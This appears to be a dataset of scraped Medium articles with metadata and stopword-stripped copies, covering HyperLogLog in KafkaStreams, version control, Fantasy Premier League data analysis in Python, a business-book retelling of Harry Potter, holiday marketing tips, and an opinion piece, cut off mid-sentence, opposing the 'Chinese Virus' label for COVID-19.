HyperLogLog into our KafkaStreams topology, and honestly, we could have done that in any other Scala streaming library with the same effort, roughly. 
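As an aside, the same fixed-memory tradeoff can be seen in miniature outside the JVM. The sketch below uses Python with the third-party datasketch library purely for comparison (an assumption of this illustration, not something the article relies on), counting one million synthetic hashtags both exactly and approximately:
import sys
from datasketch import HyperLogLog  # third-party library, assumed to be installed

exact = set()
approx = HyperLogLog(p=12)  # 2**12 registers, roughly 1-2% relative error

# One million synthetic hashtags, invented purely for illustration.
for i in range(1_000_000):
    tag = f"#hashtag-{i}"
    exact.add(tag)
    approx.update(tag.encode("utf8"))

print(len(exact))            # 1000000 -- exact, but the set alone costs tens of MB
print(sys.getsizeof(exact))  # size of the container, not even counting the strings
print(int(approx.count()))   # close to 1,000,000, from a few kilobytes of state
The exact set grows with the number of distinct hashtags, while the HyperLogLog stays at a fixed, small size, which is precisely the property the streaming topology above benefits from.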
The main takeaway is how easy this change was and how elegant and concise the end result is. The full code, which includes tests and a runnable app, is available here. Beyond HyperLogLog Perhaps by now you’re convinced that probabilistic data structures are really fascinating — and there is more than HyperLogLog! If you’re interested, don’t hesitate to check out other data structures implemented in Algebird:
https://medium.com/riskified-technology/streaming-with-probabilistic-data-structures-why-how-b83b2adcd5d4
['Eliav Lavi']
2020-10-27 10:11:11.572000+00:00
['Streaming', 'Engineering', 'Data Structures', 'Big Data', 'Scala']
Title Streaming Probabilistic Data Structures HowContent recent year streaming library seem evolved significantly name we’ve seen Akka Streams KafkaStreams Flink Spark Streaming others becoming increasingly popular might numerous reason common motivation using stream processing system avoid heavy computation upon raw data readtime Instead move computation earlier stage — around time raw data produced architectural pattern allows u obtain better response time timecritical transaction surged popularity correlation general growth data organization handle story examine rather complicated scenario easily solved intuitive capability streamlining library usually offer demonstrate probabilistic data structure help u mitigate common antipattern often encountered stream processing application carrying nonaggregative raw data deep streaming topology calculation distinct count element briefly review streaming general help maintaining aggregation data might good idea adopt usecases use KafkaStreams demonstration along way concept explored applied virtually streaming library Examples written Scala Aggregating Upon Stream Oftentimes want aggregate raw data meaningful representation serve business need later simplest example perhaps WordCount program kind HelloWorld many streaming library implementation using KafkaStreams Basically consume source Kafka topic stream source Kafka topic stream split value single word value single word group stream word stream word count occurrence per word occurrence per word produce result another Kafka topic basic idea behind using aggregation system planning ahead figure want know raw data later stage aggregate shape form represents answer question — right first know raw data mean happens question asked fact might never asked practically preparing answer possible question might need answer Stream processing aggregation nutshell approach stand complete opposition conventional one — querying database upon request crunching result order achieve desired result might work well small apps maintained small medium sized team becomes le practical big data boundary domain team naturally emerge scenario maintaining aggregation often adequate solution various business requirement Without stream processing application need query compute upon state real time Problem Hand Distinct Hashtag Count Alas aggregation achieved degree ease wonder WordCount common beginner’s example — easy implement understand let’s explore different scenario Take social medium ecosystem need keep track many unique hashtags user mentioned post first glance streaming solution request seems like direct continuation we’ve seen WordCount could consume post data group user extract aggregate hashtags used perhaps Set would allow u easily obtain desired metric — distinct count pseudotopology seemingly answer request adequate way KafkaStreams topology might look like thing happen First I’ve used type alias order avoid semanticallymeaningless String flooding code Furthermore I’ve extracted logic obtaining SetHashtag Post private function exactly described One thing like KafkaStreams intuitive API — think pretty easy grasp understand piece code even haven’t worked KafkaStreams One thing remember topology continuously produce massage upon change aggregation might seen stream update need latest state define output topic logcompacted There’s one problem implementation unbounded datastructure topology mean streaming application become memory heavy might predicted Remember said aggregation transforming raw data way fit 
readtime need Well current implementation seems violated concept don’t need SetHashtag really want know size maintain number streaming application without keeping underlying Set available better Probabilistic Data Structures Rescue Well course probabilistic data structure come haven’t heard don’t worry we’re going explore example together focus HyperLogLog aka HLL probabilistic data structure aimed solving problem we’re facing … countdistinct problem… problem finding number distinct element data stream repeated element Wikipedia initial Set based solution always 100 accurate HyperLogLog suggests tradeoff allocated memory fixed size might absolutely accurate time large error rate correlative allocated memory Moreover case error relatively small severity — estimated count might bit HyperLogLog considered probabilistic data structure many use case reasonable deal you’re working scenario cannot error kind data structure probably suitable need Scala Implementation Algebird neat Scala library created folk Twitter aimed providing “abstractions abstract algebra” significant part library revolves around approximate data type includes HyperLogLog implementation We’ll try adapt KafkaStreams app use first let’s examine work Algebird’s HyperLogLog implementation HLL type data structure responds approximateSize method allowing u obtain desired number — setsize also known cardinality Similarly working naïve Set also need add element data structure Unlike Set though adding element HLL slightly complex thing element added aren’t kept within HLL conventional Set That’s magic HyperLogLog you’re curious actually work ton video article online Previously relied Set ‘s direct API adding entry set Algebird’s support HyperLogLog relies common abstraction achieve goal — combining thing abstraction called Monoid Generally speaking Monoid type let u get empty combine two ’s order add element HLL need obtain HyperLogLogMonoid achieved easily val hllMonoid HyperLogLogMonoid new HyperLogLogMonoidbits 8 Note decide many bit allocate — allows u control error rate get empty zerostate HLL val init HLL hllMonoidzero simply add element val newElementData ArrayByte foobartoCharArraymaptoByte val newElement HLL hllMonoidcreatenewElementData val updatedHLL HLL init newElement see use HyperLogLogMonoidcreate method order create new HLL passing ArrayByte add new HLL existing one get new one updated state knowledge prepare aggregation function replace previous one we’ve group goodness together helper object Aggregation see using HyperLogLogMonoidsum addition create allows u combine several HLL one suit need perfectly we’ll extract Hashtag Post sum HLL add existing aggregative HLL Exactly wanted achieve Putting Together aggregation function initialization value ready go back KafkaStreams topology use needed adapt two line former implementation — parameter passed aggregate line 22 way obtain estimated cardinality map function line 24 There’s one thing left — need find way obtain SerdeHLL unfamiliar KafkaStreams Serde ‘s definition according official documentation Every Kafka Streams application must provide SerDes SerializerDeserializer data type record key record value eg javalangString materialize data necessary Essentially KafkaStreams might need certain Serde various operation code would compile without Since aggregation nature stateful operation simply operate information bounded current message processed KafkaStreams need know information serialized deserialized Luckily pretty easy get SerdeHLL like we’re pretty much done We’ve 
managed incorporate HyperLogLog KafkaStreams topology honestly could done Scala streaming library effort roughly main takeaway easy change elegant concise end result full code includes test runnable apps available Beyond HyperLogLog Perhaps you’re convinced probabilistic data structure really fascinating — HyperLogLog you’re interested don’t hesitate checking data structure implemented AlgebirdTags Streaming Engineering Data Structures Big Data Scala
3,870
Top Five Reasons to Learn Version Control Systems
Have you ever been in a situation where you were continually saving multiple documents with random names and got confused when you looked at them after a month or so? Well, many of us have been there, including me, and we know how tough that is each time! With the amount of information we’re being exposed to increasing each day, it’s important, not just for Software Engineers but for many others, to be able to retrieve any piece of information from anywhere without arduous effort. For Software Engineers, it’s all the more crucial to get hands-on experience using Version Control tools, as they’ll be using them in their daily lives. So, without further ado, let’s look at the top five reasons why Software Engineers (and, obviously, others) should learn Version Control.
https://medium.com/datadriveninvestor/top-five-reasons-to-learn-version-control-89c33e04e9c2
['Abishaik Mohan']
2020-12-27 15:25:45.931000+00:00
['Technology', 'Software Development', 'Innovation', 'Productivity', 'Creativity']
Title Top Five Reasons Learn Version Control SystemsContent ever situation continually saving multiple document random name got confused looked month Well many u including know tough time amount information we’re exposed increasing day it’s important Software Engineers also many retrieve piece information anywhere without arduous effort Software Engineers it’s crucial get handson experience using Version Control tool they’ll using daily life without adieu let’s mainly realize top five reason Software Engineers obviously others learn Version ControlTags Technology Software Development Innovation Productivity Creativity
3,871
Python for FPL(!) Data Analytics
Python for FPL(!) Data Analytics Using Python and Matplotlib to perform Fantasy Football Data Analysis and Visualisation author’s graph Introduction There are two reasons for this piece: (1) I wanted to teach myself some Data Analysis and Visualisation techniques using Python; and (2) I need to arrest my Fantasy Football team’s slide down several leaderboards. But first, credit to David Allen for the helpful guide on accessing the Fantasy Premier League API, which can be found here. To begin, we need to set up our notebook to use Pandas and Matplotlib (I’m using Jupyter for this), and connect to the Fantasy Premier League API to access the data needed for the analysis.
#Notebook Config
import requests
import pandas as pd
import numpy as np
%matplotlib inline
import matplotlib.pyplot as plt
plt.style.use('ggplot')
#API Set-Up
url = 'https://fantasy.premierleague.com/api/bootstrap-static/'
r = requests.get(url)
json = r.json()
Then, we can set up our Pandas DataFrames (think data tables), which will be queried for valuable insights — hopefully. Each DataFrame (_df) we create relates to a JSON data structure accessible via the FPL API. For a full list of these, run json.keys(). We’re interested in ‘elements’ (player data), ‘element_types’ (positional references), and ‘teams’.
elements_df = pd.DataFrame(json['elements'])
element_types_df = pd.DataFrame(json['element_types'])
teams_df = pd.DataFrame(json['teams'])
By default, elements_df contains a number of columns we aren’t interested in right now (for an overview of each DataFrame, see David’s article). I’ve created a new DataFrame — main_df — with columns I might want to use.
main_df = elements_df[['web_name','first_name','team','element_type','now_cost','selected_by_percent','transfers_in','transfers_out','form','event_points','total_points','bonus','points_per_game','value_season','minutes','goals_scored','assists','ict_index','clean_sheets','saves']]
It’s important to note that elements_df uses keys to reference things such as a player’s position and team. For example, in column ‘element_type’, a value of “1” = goalkeeper, and in column ‘team’ a value of “1” = Arsenal. These are references to the two other DataFrames we created (element_types_df and teams_df). If we preview element_types_df, we’ll see that each ‘id’ number here corresponds to a position:
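Continuing from the DataFrames above, the short sketch below shows one way to resolve those numeric keys into readable labels. It is an illustrative addition, not part of the original article, and the lookup column names singular_name (in element_types_df) and name (in teams_df) are assumptions about the bootstrap-static payload; check the API output and adjust if they differ.
# Map the numeric keys in main_df to readable labels using the two lookup DataFrames
position_lookup = element_types_df.set_index('id')['singular_name']   # assumed column name
team_lookup = teams_df.set_index('id')['name']                        # assumed column name

main_df = main_df.assign(
    position=main_df['element_type'].map(position_lookup),   # e.g. 1 -> 'Goalkeeper'
    team_name=main_df['team'].map(team_lookup),               # e.g. 1 -> 'Arsenal'
)

# Quick sanity check: top five players by total points, now with readable labels
print(main_df.sort_values('total_points', ascending=False)
             [['web_name', 'position', 'team_name', 'total_points']]
             .head())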
https://towardsdatascience.com/python-for-fpl-data-analytics-dadb414ccefd
['Charlie Byatt']
2020-10-16 18:20:34.390000+00:00
['Python', 'Data Analysis', 'Matplotlib', 'Data Visualization', 'Football']
Title Python FPL Data AnalyticsContent Python FPL Data Analytics Using Python Matplotlib perform Fantasy Football Data Analysis Visualisation author’s graph Introduction two reason piece 1 wanted teach Data Analysis Visualisation technique using Python 2 need arrest Fantasy Football team’s slide several leaderboards first credit David Allen helpful guide accessing Fantasy Premier League API found begin need setup notebook use Pandas Matplotlib I’m using Jupyter connect Fantasy Premier League API access data needed analysis Notebook Config import request import panda pd import numpy np matplotlib inline import matplotlibpyplot plt pltstyleuseggplot url r requestsgeturl json rjson API SetUpurl httpsfantasypremierleaguecomapibootstrapstatic r requestsgeturljson rjson set Pandas DataFrames think data table queried valuable insight — hopefully DataFrame df create relates JSON data structure accessible via FPL API full list run jsonkeys We’re interested ‘elements’ player data ‘elementtypes’ positional reference ‘teams’ elementsdf pdDataFramejsonelements elementtypesdf pdDataFramejsonelementtypes teamsdf pdDataFramejsonteams default elementsdf contains number column aren’t interested right overview DataFrame see David’s article I’ve created new DataFrame — maindf — column might want use maindf elementsdfwebnamefirstnameteamelementtypenowcostselectedbypercenttransfersintransfersoutformeventpointstotalpointsbonuspointspergamevalueseasonminutesgoalsscoredassistsictindexcleansheetssaves It’s important note elementsdf us key reference thing player’s position team example column ‘elementtype’ value “1” goalkeeper column ‘team’ value “1” Arsenal reference two DataFrames created elementtypesdf teamsdf preview elementtypesdf we’ll see ‘id’ number corresponds positionTags Python Data Analysis Matplotlib Data Visualization Football
3,872
The “business book” version of Harry Potter
What we can learn from Harry Potter Think of how much we learn about love and friendship and perseverance through reading a book like Harry Potter. Let’s use a super relatable example of a narrative structure used well in this book and how it taught us about character motivations and reliability. (And okay, I’m going to say something here that may shock you if for some reason you’re one of the three remaining people on Earth who hasn’t read Harry Potter yet. If that’s you, then stop reading now.) Spoiler alert: Dumbledore dies. Not just dies, but Snape kills him. In cold blood. Right there, on the balcony with his wand. While Harry is watching. Damn. For me, this was one of those moments in literature that really came to define how I looked at life, death, love, and friendship. I read this book super early on in my life, while I was still a sponge for information, and Dumbledore may have been one of the first characters outside of a Disney movie that I came to love who was then taken away from me. Of course, we get over this, yes. But then we also learn from it. And we learn how much of a badass Harry Potter becomes afterward — we know exactly why Harry needs to avenge his death. We know about his parents and their deaths, and we understand, even if we will never truly relate, the reasons why he has to ultimately take on all of the horcruxes, destroy them, and eventually go toe-to-toe with the evil Voldemort. Part of the beauty of this sequence is that it takes a lifetime to get there. Seven books and over 1 million words in all. Was the payoff worth it? Just look at how much the Harry Potter franchise is worth, and you tell me. Now, let’s try one more thing. I’m going to tell the Harry Potter story in a business-book-inspired anecdote. Ready? Here we go: Harry Potter as a business book case study: In this local school district, the unthinkable happened: The headmaster was murdered. Not only that, but the murderer remained at large. The remaining faculty and students had all the signs of early onset panic, not to mention questions from parents at home and the unrelenting press inquiries. In the 1,000 years since Hogwarts has been the pre-eminent wizarding institution, it was this murder that might put it all at risk. What could they do? But, as we’ve discussed earlier in this book, sometimes the greatest leaders emerge from the least likely of places. In the end, it wouldn’t be the headmaster-in-training or any other senior faculty who would reclaim the honor and dignity of this venerable institution, but a boy. You see, this boy had a decade’s worth of anger and revenge building up in him about murders like this. His parents had also been murdered, and, particularly early on in his school years, he was called out regularly for “being different.” (He had a peculiar scar above his forehead and a strange connection to snakes.) It turned out that, over the years, this boy, Harry, had established something similar to a paternal relationship with Albus Dumbledore. And Albus had, in turn, been teaching Harry, too. When Dumbledore was murdered, Harry rallied his friends together and committed them to a pact. They met in secret, practicing illegal spells on school property and training for a potential future battle. Eventually, these friendships, and the skills they acquired together, saved the school from the battle of the millennium, along with most of those inside.
This is why it’s important to always encourage the “kids who are just a little bit different.” You never know who will have a chip on their shoulder big enough to save your entire world one day. Something tells me this wouldn’t quite rally the same kind of emotional turbulence inside that would get people dressing up like wizards and taking quizzes about which sorting house they belong inside for decades to come. Maybe the trouble with business books isn’t that they aren’t telling stories. Maybe it’s just that we aren’t telling them the right way.
https://bethanymarz.medium.com/the-business-book-version-of-harry-potter-b36af7d6c29f
['Bethany Crystal']
2019-02-11 13:06:06.376000+00:00
['Business', 'People', 'Stories', 'Books', 'Harry Potter']
Title “business book” version Harry PotterContent learn Harry Potter Think much learn love friendship perseverance reading book like Harry Potter Let’s use super relatable example narrative structure used well book taught u character motivation reliability okay I’m going say something may shock reason you’re one three remaining people Earth hasn’t read Harry Potter yet that’s stop reading Spoiler alert Dumbledore dy dy Snape kill cold blood Right balcony wand Harry watching Damn one moment literature really came define looked life death love friendship read book super early life still sponge information may one first character outside Disney movie came love taken away course get yes also learn learn much badass Harry Potter becomes afterward — know exactly Harry need avenge death know parent death understand even never truly relate reason ultimately take horcruxes destroy eventually go toetoto evil Voldemort Part beauty sequence take lifetime get Seven book 1 million word payoff worth look much Harry Potter franchise worth tell let’s try one thing I’m going tell Harry Potter story business book inspired anecdote Ready go Harry Potter business book case study local school district unthinkable happened headmaster murdered murderer remained large remaining faculty student sign early onset panic mention question parent home unrelenting press inquiry 1000 year since Hogwarts preeminent wizarding institution murder might put risk could we’ve discussed earlier book sometimes greatest leader emerge least likely place end wouldn’t headmasterintraining senior faculty would reclaim honor dignity venerable institution boy see boy decade’s worth anger revenge building murder like parent also murdered particularly early school year called regularly “being different” peculiar scar forehead strange connection snake turned year boy Harry established something similar paternal relationship Albus Dumbledore Albus turn teaching Harry Dumbledore murdered Harry rallied friend together committed pact met secret practicing illegal spell school property training potential future battle Eventually friendship skill acquired together saved school battle millennium thereby saving school inside it’s important always encourage “kids little bit different” never know chip shoulder big enough save entire world one day Something tell wouldn’t quite rally kind emotional turbulence inside would get people dressing like wizard taking quiz sorting house belong inside decade come Maybe trouble business book isn’t aren’t telling story Maybe it’s aren’t telling right wayTags Business People Stories Books Harry Potter
3,873
10 Holiday Marketing Tips from Larry Kim, Neil Patel and More
It’s time to amp up and adjust our marketing strategies for the holidays! If you want to get ahead of the marketing game and stand out from the crowd, check out these incredible unicorn tips from the top social media marketing experts. We’ve got insights from Mari Smith, Neil Patel, Virginia Nussey, Dennis Yu, Lilach Bullock, Lisa Dougherty, Marsha Collier, Sujan Patel and Kristel Cuenta-Cortez. Among the tips? Leveraging live videos, launching Facebook Messenger chatbots, running social media ads and more — all with the aim of increasing brand visibility, ramping up your holiday sales and boosting ROI. So let’s jump right in — and I’ll start with my own №1 holiday marketing tip! 1. Run Facebook Messenger Ads | Larry Kim, CEO of MobileMonkey Ad prices get crazy competitive around the holidays! Since most of your sales are going to come from customers with pre-existing brand affinity, focus the majority of your social ads budget using remarketing as the targeting option rather than trying out new, unproven audiences at this critical time. People’s inboxes will be full of offers, so try reaching your audience using new higher-engagement marketing channels like Facebook Messenger ads in Facebook and Instagram to ensure your targeted audience actually sees your important marketing messages 2. Go Live on Facebook | Mari Smith, Facebook Marketing Expert Use holiday-themed Facebook Live videos to really engage with your audience this holiday season. Facebook continues to favor content that generates meaningful social interaction, specifically conversations between people within the comments on Page posts. Live video typically leads to discussion among viewers on Facebook, which helps bump up the algorithms and you should see even more reach on your posts. In fact, Facebook states that live videos on average get six times as many interactions as regular videos. Strive to stand out in the news feed and create “thumb-stopping” live video content that draws your audience in. What if you did a whole “bah humbug” Facebook Live centered around how crazy it is that stores seem to start pushing the Holidays earlier and earlier every year? Use the broadcast as a fun way to get your audience talking to you — and with one another — about their preferences around the Holidays. You can then retarget your video viewers with different content driving to your website, offers, etc. Or, perhaps someone in your office would be willing to dress up as Santa Claus and do a whole series of Facebook Live videos where you do prize drawings and giveaways! Or, mobilize some team members to come on live video as “Santa’s elves” and show behind-the-scenes of how your products are created, or your service is developed. Think outside the box and get creative to put a smile on the faces of your prospects and customers and have your business/brand be top of feed and top of mind! 3. Collaborate with Influencers and Create Gift Suggestions | Lilach Bullock, Content Marketing and Social Media Specialist It’s difficult to stand out during the holiday season when everybody is sharing special offers and discounts. But one way to stand out and generate better results during this period, is to collaborate with a relevant social influencer as they can help you reach a wider audience. However, you need to start working on this campaign way ahead of time: from finding the ideal influencers to work with to planning the actual content, it’s a big project but one that can yield amazing results. 
Another tip I have to mention is to create remarketing campaigns on social media and target all of those people who viewed your products but didn’t buy. Everyone is looking for gifts during this time period so chances are, they’re checking out a lot of ideas and products — remind them of your products at the right time and it can have an amazing effect on your sales. 4. Give Your Social Media Channels a Holiday Makeover | Virginia Nussey, Marketing Director at MobileMonkey Holiday fever is not just for ecommerce. B2B should get hyped for the holidays, too. Holidays are an occasion for a company to reveal its customer appreciation along with its culture, brand and staff appreciation. And doing so can have a positive marketing impact through visibility and brand affinity during the cheery time of year. Give your Facebook chatbot and social media avatars a holiday makeover — and that will mean something different for every brand. Just because B2B marketers don’t have a Black Holiday sale to promote for the holidays (although, you certainly could!), doesn’t mean you shouldn’t have some holiday fun. Your customers (and future customers) may fall a little more in love with you when you take the opportunity to get in the spirit! 5. Curate Sentimental User-Generated Content | Dennis Yu, CEO of BlitzMetrics My №1 tip for the holidays … ask customers and employees what they’re grateful for, collecting the pictures and videos. Then after getting their permission, you now have a massive library of UGC (user-generated content) that you can mix and match to drive sales without having to rely as much on sales and discounts. And now you’ve solved your content issue, too. 6. Run Remarketing Ads | Neil Patel, Founder of Neil Patel Digital During the holiday season, expect your ad costs to increase. Consider pushing out more educational content and sharing them on your social profiles. You can even spend a bit of ad money to promote these educational pieces. From there remarket all of those users and pitch them your product/service through remarketing ads. It’s one of the cheapest ways to acquire customers from the social web at an affordable rate. 7. Show the Human Side of Your Business | Sujan Patel, Co-founder of Mailshake Something I’ve seen that customers and followers of our brand engage with around the holidays is learning more about the team behind the scenes. We are fully remote, and have employees working literally around the world. We’ll work with our employees to share interesting stories about them with our audience to give people the human side of our business. People are in “family” mode, not “business” mode around the holidays. Sharing our company family with them pulls on that thread a bit. 8. Start Early | Marsha Collier, Social Media Author It’s a two-pronged approach. Start by reconnecting with your existing customers very early on without a hard sell. Let them know you’re there to help make their holidays easier. Then during the season, your ads should always go for the hard close — make your offer ads irresistible. 9. Create Holiday-Themed Content | Kristel Cuenta-Cortez, Social Media Strategist There’s so much truth in the statement “If you fail to plan, you plan to fail,” especially when crafting a social media campaign for your brand. One best practice successful brands do to ramp up their campaigns is to put together a holiday-themed content schedule based on their goals. 
For example, if your goal is to solicit customer reviews and collect user-generated content that you can utilize in the future, you can run a simple photo contest where you ask your customers to submit their entries with a branded hashtag. Pick a relevant prize and decide on the theme, and find the best time to launch it! Monitor your results and adjust your strategy as you go along! This doesn’t only provide social proof, but it also saves valuable time and effort since user-generated content is generally free. 10. Leverage Influencers | Lisa Dougherty, Community Manager at Content Marketing Institute My number one social media marketing tip for B2C marketers is to work with top influencers in your niche. People like to scroll through their newsfeeds looking for gift-giving ideas. I know I do. And, they tend to trust brand recommendations from individuals (even if they don’t know them). But, before you get started, make sure you’ve set a clear goal that aligns with your business objectives. Once you’ve determined your goals, you’ll need to find the right influencers in your industry to work with. Once you do, put those influencers to work as your brand’s little elves creating customized content for your social media channels to help increase visibility, trustworthiness, and generate ROI for your brand. Be a Unicorn in a Sea of Donkeys Get my very best Unicorn marketing & entrepreneurship growth hacks: 2. Sign up for occasional Facebook Messenger Marketing news & tips via Facebook Messenger. About the Author Larry Kim is the CEO of MobileMonkey — provider of the World’s Best Facebook Messenger Marketing Platform. He’s also the founder of WordStream. You can connect with him on Facebook Messenger, Twitter, LinkedIn, Instagram. Do you want a Free Facebook Chatbot builder for your Facebook page? Check out MobileMonkey! Originally posted on Inc.com
https://medium.com/marketing-and-entrepreneurship/10-holiday-marketing-tips-from-larry-kim-neil-patel-and-more-ac0731e1e7a7
['Larry Kim']
2020-10-20 08:08:14.523000+00:00
['Marketing', 'Entrepreneurship', 'Business', 'Social Media', 'Marketing Tips']
Title 10 Holiday Marketing Tips Larry Kim Neil Patel MoreContent It’s time amp adjust marketing strategy holiday want get ahead marketing game stand crowd check incredible unicorn tip top social medium marketing expert We’ve got insight Mari Smith Neil Patel Virginia Nussey Dennis Yu Lilach Bullock Lisa Dougherty Marsha Collier Sujan Patel Kristel CuentaCortez Among tip Leveraging live video launching Facebook Messenger chatbots running social medium ad — aim increasing brand visibility ramping holiday sale boosting ROI let’s jump right — I’ll start №1 holiday marketing tip 1 Run Facebook Messenger Ads Larry Kim CEO MobileMonkey Ad price get crazy competitive around holiday Since sale going come customer preexisting brand affinity focus majority social ad budget using remarketing targeting option rather trying new unproven audience critical time People’s inboxes full offer try reaching audience using new higherengagement marketing channel like Facebook Messenger ad Facebook Instagram ensure targeted audience actually see important marketing message 2 Go Live Facebook Mari Smith Facebook Marketing Expert Use holidaythemed Facebook Live video really engage audience holiday season Facebook continues favor content generates meaningful social interaction specifically conversation people within comment Page post Live video typically lead discussion among viewer Facebook help bump algorithm see even reach post fact Facebook state live video average get six time many interaction regular video Strive stand news feed create “thumbstopping” live video content draw audience whole “bah humbug” Facebook Live centered around crazy store seem start pushing Holidays earlier earlier every year Use broadcast fun way get audience talking — one another — preference around Holidays retarget video viewer different content driving website offer etc perhaps someone office would willing dress Santa Claus whole series Facebook Live video prize drawing giveaway mobilize team member come live video “Santa’s elves” show behindthescenes product created service developed Think outside box get creative put smile face prospect customer businessbrand top feed top mind 3 Collaborate Influencers Create Gift Suggestions Lilach Bullock Content Marketing Social Media Specialist It’s difficult stand holiday season everybody sharing special offer discount one way stand generate better result period collaborate relevant social influencer help reach wider audience However need start working campaign way ahead time finding ideal influencers work planning actual content it’s big project one yield amazing result Another tip mention create remarketing campaign social medium target people viewed product didn’t buy Everyone looking gift time period chance they’re checking lot idea product — remind product right time amazing effect sale 4 Give Social Media Channels Holiday Makeover Virginia Nussey Marketing Director MobileMonkey Holiday fever ecommerce B2B get hyped holiday Holidays occasion company reveal customer appreciation along culture brand staff appreciation positive marketing impact visibility brand affinity cheery time year Give Facebook chatbot social medium avatar holiday makeover — mean something different every brand B2B marketer don’t Black Holiday sale promote holiday although certainly could doesn’t mean shouldn’t holiday fun customer future customer may fall little love take opportunity get spirit 5 Curate Sentimental UserGenerated Content Dennis Yu CEO BlitzMetrics №1 tip holiday … ask customer employee they’re grateful 
collecting picture video getting permission massive library UGC usergenerated content mix match drive sale without rely much sale discount you’ve solved content issue 6 Run Remarketing Ads Neil Patel Founder Neil Patel Digital holiday season expect ad cost increase Consider pushing educational content sharing social profile even spend bit ad money promote educational piece remarket user pitch productservice remarketing ad It’s one cheapest way acquire customer social web affordable rate 7 Show Human Side Business Sujan Patel Cofounder Mailshake Something I’ve seen customer follower brand engage around holiday learning team behind scene fully remote employee working literally around world We’ll work employee share interesting story audience give people human side business People “family” mode “business” mode around holiday Sharing company family pull thread bit 8 Start Early Marsha Collier Social Media Author It’s twopronged approach Start reconnecting existing customer early without hard sell Let know you’re help make holiday easier season ad always go hard close — make offer ad irresistible 9 Create HolidayThemed Content Kristel CuentaCortez Social Media Strategist There’s much truth statement “If fail plan plan fail” especially crafting social medium campaign brand One best practice successful brand ramp campaign put together holidaythemed content schedule based goal example goal solicit customer review collect usergenerated content utilize future run simple photo contest ask customer submit entry branded hashtag Pick relevant prize decide theme find best time launch Monitor result adjust strategy go along doesn’t provide social proof also save valuable time effort since usergenerated content generally free 10 Leverage Influencers Lisa Dougherty Community Manager Content Marketing Institute number one social medium marketing tip B2C marketer work top influencers niche People like scroll newsfeeds looking giftgiving idea know tend trust brand recommendation individual even don’t know get started make sure you’ve set clear goal aligns business objective you’ve determined goal you’ll need find right influencers industry work put influencers work brand’s little elf creating customized content social medium channel help increase visibility trustworthiness generate ROI brand Unicorn Sea Donkeys Get best Unicorn marketing entrepreneurship growth hack 2 Sign occasional Facebook Messenger Marketing news tip via Facebook Messenger Author Larry Kim CEO MobileMonkey — provider World’s Best Facebook Messenger Marketing Platform He’s also founder WordStream connect Facebook Messenger Twitter LinkedIn Instagram want Free Facebook Chatbot builder Facebook page Check MobileMonkey Originally posted InccomTags Marketing Entrepreneurship Business Social Media Marketing Tips
3,874
Bill Maher Is Wrong, We Shouldn’t Call COVID-19 the “Chinese Virus”
Bill Maher Is Wrong, We Shouldn’t Call COVID-19 the “Chinese Virus” Chinese people have enough to deal with right now. Let’s not add our bigotry to their misery. There’s a pretty big debate raging right now in the United States— and pretty much only in the United States— over whether or not COVID-19 should be dubbed the “Chinese Virus.” To me this seemed so obviously xenophobic that I didn’t feel much need to write a rebuttal. The nomenclature was being pushed almost exclusively by conservatives with a history of bigotry, including President Trump himself. But then somehow, the nonsense started to spread. While most of the mainstream media is heeding the advice of the World Health Organization to not use the term “Chinese Virus,” liberal comedian and talk show host Bill Maher disagrees. On the April 10 episode of his TV show Real Time, Bill Maher thought it wise to film a five-minute rant about how this whole thing is China’s fault, and we should all be blaming them. Before Bill acts as a carrier to spread this xenophobic stance beyond the toxic bubble of conservative news and radio, I would like to offer my counterargument. I can’t believe this needs to be said, but here’s why we shouldn’t be calling COVID-19 the “Chinese Virus.” Real Time with Bill Maher, 10 April 2020 1. The “we always do” argument is counterfactual Bill starts his segment by giving a bunch of examples of viruses that were named after where they originated. This is an argument I’ve also seen from prominent figures on Twitter — that because Lyme disease was named after a town of 7,000 people in Connecticut, coronavirus should be tied to the 1.38 billion people of China. This argument doesn’t hold for several reasons. First of all, why all of China? The disease originated very specifically from a single wet market in Wuhan province; why not name it after that one market? The reason is simple: accuracy was never the true concern. Ebola was named after a river, not a country or an ethnicity. Zika virus was named after a forest. Nobody is blaming the river or the forest for the spread of the virus, but Bill explicitly wants to blame China, so he expands his naming convention to fit his political argument. The one case that Bill clings to where a virus was actually named after a fairly large part of the world is MERS, or Middle Eastern Respiratory Syndrome. But even here, nobody uses the full name, nobody blamed the entire Middle East for having areas where camels live in close proximity to humans (MERS is said to have originated from a camel), and the region is home to a wide variety of countries and ethnicities, making the name arguably less xenophobic. The other important counter argument to this whole “this is how we’ve always named viruses” nonsense is that, well, it’s not. SARS stands for Severe Acute Respiratory Syndrome, not South-Asian Respiratory Syndrome. Think of all the pandemics we’ve suffered in recent memory, whether mad cow disease, swine flu, bird flu, HIV, HPV, even going back to the black plague — none of these were named after where the disease originated. Naming the virus after the region where it originated is the exception, not the rule. If anything, we should be questioning why we thought MERS was acceptable. 
The final argument on this point is that when the virus began, nobody was calling it the “Chinese Virus.” The virus first showed up in the media as simply “the coronavirus.” That name is still used in a lot of other countries — in France it’s “coronavirus,” in Japan it’s “new-form corona” (新型コロナ). Only in countries that, for some reason or another, want to blame China is the term “Chinese Virus” used, and it was adopted well after the virus started to spread. Well after other names were already attributed and widely accepted. 2. There are reasons to criticize China. The origin of the virus isn’t one of them. Now that we’ve established that there is no historical or logical reason to call COVID-19 the “Chinese Virus,” let’s look at the core of Bill’s rant: blaming China. The only clear reason he gives to is that some people in China eat bats. There is a sliver of truth to part of this argument. It’s true that wet markets are vectors for disease. It’s true the Chinese government knew about this, and poor policy decisions made this pandemic worse. But none of that has to do with eating bats. Bill is essentially saying, “Eating bats is wrong; the whole world should eat what I find palatable, like chickens, pigs and cows.” Plenty of people around the world eat plenty of food that, if mishandled, can lead to disease. This includes the United States, where you can buy a whole host of exotic meats if you know where to look. From an epidemiological perspective, the problem isn’t what Chinese people are eating, but how those animals are being handled. The close proximity and unsanitary conditions in wet markets make it more likely for certain virus strands to jump species and mutate in ways that can ultimately be dangerous to humans. Chinese authorities knew about these risks but authorized wet markets anyway, which is a reckless and shortsighted policy that deserves criticism. Blame the authorities, not the entire country and its population. Also, stop with the “Ewww gross, how could you eat that?” argument as a way to demonize other cultures. Bill’s tirade becomes particularly misleading when he implies that Chinese culture in general is causing a bunch of viruses to emerge. It’s true SARS also originated from the same region, although there is not enough evidence to suggest it came from a wet market. Bird flu likely comes from intensive bird farming — those chickens that almost everyone eats in tremendous quantities all over the world. The bird flu epidemic started in Hong Kong, which doesn’t have wet markets, and whose culture overall is significantly different from that of the people in Wuhan province. To sum up, the coronavirus is much more complex than “China does unhealthy stuff,” and using this pandemic to air out political grievances isn’t helping anyone. 3. We’re all in this together The world’s leading health and human rights experts are adamant: We’re all in this together, and we should be 